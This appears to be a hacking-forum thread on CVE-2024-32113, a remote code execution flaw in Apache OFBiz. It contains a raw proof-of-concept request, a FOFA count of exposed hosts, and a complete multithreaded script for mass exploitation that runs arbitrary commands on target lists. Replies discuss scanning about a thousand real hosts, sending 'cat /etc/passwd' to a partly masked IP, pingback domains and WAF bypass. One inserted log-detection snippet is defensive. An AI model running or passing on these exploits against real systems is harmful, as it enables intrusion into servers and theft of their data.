
Remote CVE-2024-32113 - Apache OFBIZ RCE

rwxrwx

(L3) cache
Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in Apache OFBiz. This issue affects Apache OFBiz: before 12/18/13. Users are recommended to upgrade to version 12/18/13, which fixes the issue.

FOFA: app="Apache_OFBiz"
- 3146 Results

POC:
POST /webtools/control/forgotPassword;/ProgramExport HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 127.0.0.1:8443

groovyProgram=throw+new+Exception('id'.execute().text);

src: https://github.com/Mr-xn/CVE-2024-32113
 
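A defender-side check for the request shape of the PoC above, added here as an example and not code from the original post or the linked repository: it parses constructed combined-format access-log lines, decodes percent-encoding, and flags any /webtools/control/ request whose path carries a ";/" segment, rating it critical when the view after ";/" is ProgramExport. It assumes Apache/Nginx combined log format; the IPs and log lines are constructed.

```python
import re
from urllib.parse import unquote

# Constructed sample lines in combined access-log format (not taken from the thread).
SAMPLE_LOG = """\
203.0.113.10 - - [07/Aug/2024:10:01:12 +0000] "POST /webtools/control/forgotPassword;/ProgramExport HTTP/1.1" 200 812 "-" "Mozilla/5.0"
203.0.113.10 - - [07/Aug/2024:10:01:13 +0000] "GET /webtools/control/main HTTP/1.1" 200 4120 "-" "Mozilla/5.0"
198.51.100.7 - - [07/Aug/2024:10:02:40 +0000] "POST /webtools/control/forgotPassword HTTP/1.1" 200 600 "-" "Mozilla/5.0"
198.51.100.7 - - [07/Aug/2024:10:03:01 +0000] "POST /webtools/control/forgotPassword%3B/main HTTP/1.1" 403 0 "-" "curl/8.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

# A ";/" inside the controller path: the view before ";" is what the permission
# check sees (forgotPassword is unauthenticated), the view after it is the one
# OFBiz actually renders. That split is the request shape of the PoC above.
CONFUSED_PATH_RE = re.compile(r'^/webtools/control/([^;?]*);/([^?/]+)', re.IGNORECASE)
# Views that run server-side code when reached; ProgramExport is the one in the PoC.
CODE_EXEC_VIEWS = {'programexport'}

def parse_line(line):
    """Split one combined-format line into its fields, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None

def classify(path):
    """Return (checked_view, rendered_view) if the path uses the ;/ split, else None."""
    decoded = unquote(path)  # %3B -> ';' so percent-encoded variants are not missed
    m = CONFUSED_PATH_RE.match(decoded)
    return (m.group(1), m.group(2)) if m else None

def scan(log_text):
    """Return one alert dict per request that uses the ;/ split, regardless of status."""
    alerts = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        hit = classify(rec['path']) if rec else None
        if not hit:
            continue
        checked, rendered = hit
        severity = 'critical' if rendered.lower() in CODE_EXEC_VIEWS else 'high'
        alerts.append({'ip': rec['ip'], 'ts': rec['ts'], 'status': int(rec['status']),
                       'checked': checked, 'rendered': rendered, 'severity': severity})
    return alerts
```

A 403 on such a request is still worth an alert: the probe shape shows intent even when the instance is patched.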
CVE-2024-32113 Apache OFBIZ Batch Scanning

CVE-2024-32113 Batch Scanning :

Python:
import requests
from requests.packages.urllib3.exceptions import InsecureRequestWarning
import warnings
import sys
import re
import argparse
from concurrent.futures import ThreadPoolExecutor, as_completed

warnings.simplefilter('ignore',InsecureRequestWarning)
def banner():
    banner = """
    \n
    ***********************************************
    *              Apache OFBiz                   *
    *       CVE-2024-32113 Batch Scanning         *
    *            PowerBy: YongYe-Security         *
    ***********************************************
    \n
    """
    print(banner)
def Target_File(filename):
    ip_addresses = []
    with open(filename, 'r') as file:
        for line in file:
            url = line.strip()
            if url.startswith('https://'):
                ip_addresses.append(url)
            else:
                ip_addresses.append('http://' + url)
    return ip_addresses
def CheckTarget(ip,cmd):
    url = f'{ip}/webtools/control/forgotPassword;/ProgramExport'
    headers = {
        'User-Agent': 'Mozilla/999.0 (Windows 3200; Win x12400) Chrome/888.0.7.2 Safari/537.36',
        'Content-Type': 'application/x-www-form-urlencoded'
    }
    data = {'groovyProgram': f"throw new Exception('{cmd}'.execute().text);"}
    try:
        response = requests.post(url, headers=headers, data=data, timeout=5, verify=False)
        response_text = response.text
        match = re.search(r'java\.lang\.Exception:(.*)', response_text)
        if match:
            exception_details = match.group(1).strip()
            print(f'[+] {ip}\t\t{exception_details}')
            with open('Out.txt', 'a') as out_file:
                out_file.write(f'{ip}\n')
        else:
            print(f'[-] {ip}')
    except Exception:
        pass

def main():
    banner()
    parser = argparse.ArgumentParser(description='CVE-2024-32113 Batch Scanning')
    parser.add_argument('-f', '--file', required=True, help='Target File')
    parser.add_argument('-c', '--cmd', default='id', help='command')
    args = parser.parse_args()
    ip_addresses = Target_File(args.file)
    with ThreadPoolExecutor(max_workers=10) as executor:
        futures = [executor.submit(CheckTarget,ip,args.cmd) for ip in ip_addresses]
        for future in as_completed(futures):
            pass

if __name__ == "__main__":
    main()

Help


Code:
CVE-2024-32113 Batch Scanning

optional arguments:
-h, --help            show this help message and exit
-f FILE, --file FILE  Target File
-c CMD, --cmd CMD     command


Batch Scanning
The -c parameter is optional and defaults to id. Scan results are saved in Out.txt (vulnerable targets).

Code:
python3 CVE-2024-32113.py -f TargetFile.txt




Source Github : https://github.com/YongYe-Security/CVE-2024-32113
 
hmm
hmm nicely done. more complete code!
 
So what came of it in the end? A 200 response that, as usual, goes straight to the trash? My web coder is on vacation; I'm ready to work with someone! This one https://github.com/ThatNotEasy/CVE-2024-38856/blob/main/CVE-2024-38856.py has more path variants, but you run 1k targets through it and every one comes back negative, no response at all.
[*] Options Passed:
target: https://ххх.2хх.1х8.7х
port: 8443
command: cat /etc/passwd
scan: False
domain: None
file: None
output: None
proxy: None
exploit: True
timeout: 10
[!] Exploit executed, but no output found in the response :
[+] Target: https://ххх.2хх.1х8.7х, Port: 8443
[+] Status Code: 200
Hi

The topic is about a different vulnerability, but what problem did you have with CVE-2024-38856?

Use this script instead, maybe you will get new results: https://github.com/securelayer7/CVE-2024-38856_Scanner

Please note that to test and find vulnerable instances, use the -d switch and supply a domain to get a pingback.

Sometimes you get a 200 response but no pingback on the domain; there are several situations that may explain it:

1 - you are on a honeypot

2 - the target is vulnerable but the domain is blocked on the sending side; some domains are filtered on the instance's firewall, for example the interact.sh domain or free ngrok domains are sometimes blocked by a firewall or WAF

3 - maybe your payload was blocked before it hit the target; try a bypass method

But if you don't have these problems, the PoCs publicly available on the internet or GitHub are useful; I got pingbacks from a list of 10 random targets using the script I mentioned above. If your instance doesn't have the vulnerability you will get a 401 or 403 response.

good luck
 